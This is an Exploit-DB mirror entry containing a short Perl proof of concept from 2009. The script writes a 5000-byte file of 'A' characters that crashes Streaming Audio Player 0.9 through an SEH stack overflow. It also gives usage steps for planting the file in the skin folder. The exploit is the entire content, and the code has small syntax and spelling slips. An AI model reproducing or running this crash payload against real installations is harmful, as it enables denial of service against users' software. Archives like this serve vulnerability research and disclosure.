exploit-db-mirror/exploits/windows/dos/9189.pl
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

10 lines
No EOL
358 B
Perl
Executable file

#Streaming Audio Player 0.9 (txt) Local Stack Overflow PoC (Seh)
#By: ThE g0bL!N
my $crash="\x41" x 5000 ; # just random
open(myfile,'>>UI.txt')
print myfile $crash;
# Usage: After Clicking On file Perl Copy TXT File on this Diredtory
skin\default\ Then Run The Program Boom !!!!!!! the Program Crashed
# Note : The Bug is Seh :)
# milw0rm.com [2009-07-17]